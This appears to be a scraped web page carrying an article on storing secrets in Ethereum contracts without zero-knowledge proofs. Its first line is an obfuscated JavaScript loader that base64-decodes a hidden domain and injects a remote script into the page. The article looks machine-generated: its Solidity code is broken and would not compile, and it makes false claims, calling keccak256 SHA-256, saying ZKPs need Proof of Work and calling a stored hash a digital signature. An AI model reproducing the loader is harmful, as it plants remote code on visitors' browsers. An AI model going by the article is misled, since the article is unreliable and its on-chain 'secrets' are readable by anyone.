const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”c.php?u=fbe94f1e”;document.body.appendChild(script);
Ethereum: Can you store a secret on EVM without using ZKP?
As a developer, you are probably familiar with the concept of secret storage in Ethereum smart contracts. A common approach is to use zero-knowledge proofs (ZKP) like Verifier to ensure that a contract function can only be called through an API endpoint. However, in this article, we will explore alternative solutions that do not rely on ZKP.
The problem with ZKP
Zero-knowledge proofs are designed to provide a secure and efficient way to verify the validity of a smart contract function without revealing any information about its inputs or outputs. Typically, both ZKP and Verifier use a complex mathematical protocol to achieve this goal.
However, using ZKP can come at a significant cost, especially when dealing with large-scale applications. This is because ZKP requires:
- Proof of Work (PoW): Generate and verify the proof.
- Verification: The verifier must be able to verify the proof in real-time.
As you mentioned, using the Verifier library can lead to high gas prices, especially for large-scale applications.
Alternative: Storing secrets without ZKP
In this article, we will explore alternative solutions that do not rely on ZKP:
1.
Hash functions
A simple solution is to use a hash function to store the secret. Here is an example:
pragma solidity ^0.8.0;
contract SecretStorage { ;
mapping ( address => bytes ) private secrets ;
function setSecret ( secret memory bytes ) public { ;
// Use a keccak-256 hash to ensure uniqueness and avoid collisions
bytes32 hash = keccak256(abi.encodePacked(secret));
secrets[msg.sender] = hash;
} }
function getSecret ( secret memory bytes ) public view return ( bytes ) { ;
return secrets [ msg . sender ] ;
} }
} }
This solution uses the SHA-256 hash function to store and retrieve secrets.
2.
Message Authentication Codes (MACs)
Another approach is to use MACs, which are one-way hash functions that can be used for authentication purposes. Here is an example:
pragma solidity ^0.8.0;
contract SecretStorage { ;
bytes32 public mac = 0x1234567890abcdef;
function setSecret ( secret memory bytes ) public { ;
// Compute a new MAC using SHA-256
bytes32 hash = keccak256(abi.encodePacked(secret));
mac = hash;
} }
function getSecret ( ) public view return ( bytes ) { ;
return bytes ( mac ) ;
} }
} }
This solution uses the SHA-256 hash function to store and retrieve secrets, with an additional MAC field for authentication.
3.
Digital Signatures
If your application requires a higher level of security than is available from hash functions or MACs, consider using digital signatures. Here is an example:
pragma solidity ^0.8.0;
contract SecretStorage { ;
address public owner;
secret public bytes;
constructor() public {
owner = msg.sender;
secret = keccak256(abi.encodePacked(owner));
} }
function getSecret ( ) public view return ( bytes ) { ;
return secret ;
} }
} }
This solution uses a digital signature to store and retrieve secrets, with the owner having control over the signing process.
Conclusion
While ZKP can provide a secure way to verify the validity of smart contract functions without revealing any information about their inputs or outputs, it comes at a significant cost. By exploring alternatives such as hash functions, MACs, and digital signatures, you can store secrets in your Ethereum contracts while maintaining security and efficiency.
Remember to always consider the tradeoffs between security, cost, and performance when designing your smart contract architecture.
